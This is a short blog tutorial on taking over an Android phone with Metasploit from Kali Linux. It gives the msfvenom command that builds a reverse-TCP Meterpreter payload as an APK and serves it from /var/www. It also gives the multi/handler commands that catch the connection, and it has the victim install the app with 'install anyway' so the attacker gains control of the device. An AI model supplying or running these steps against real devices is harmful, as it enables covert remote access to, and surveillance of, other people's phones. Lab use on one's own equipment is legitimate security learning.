Exploiting Android using Metasploit in Kali-Linux
Hello everyone, I'm Jayneel Chokshi
This blog is related to exploiting Android system using Kali Linux.
So, basically we need two operating systems,
1. Kali-Linux(attacker)
2. Android(victim).
This Practical works when both of the machines are in same network.
So. I have installed Kali-linux in Virtualbox and I am using my Android Phone.
you have to do same if you are also trying to do same as me.
This also works if you have host machine kali and on other side you have Android Device with you.
You can also install kali on Virtualbox and set it to bridge network.
Practical Starts Here -
1. go to kali terminal and type the following command.
to know your ip.
ifconfig
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=4444 R> /var/www/jayneel.apk
2. Now the jayneel.apk file was generated in file system/var/www.
3. Now again type the following command s to the terminal.
service apache2 status
4. Type following Commands in terminal.(don't close the terminal window after executing last command)
type your kali ip instead of 192.168.1.3
msfconsole
use multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.1.3
set LPORT 4444
exploit
5.Tick all the options and click install
6. After installing click on install anyway.
7. after execution of that file, you will see that the kali got the session,
You will see the following message.
Now you can control the Android Device from meterpreter.
I am writing command sys info, this command show me the system info of that system,
Thankyou


👍🏻
ReplyDeletegood
Delete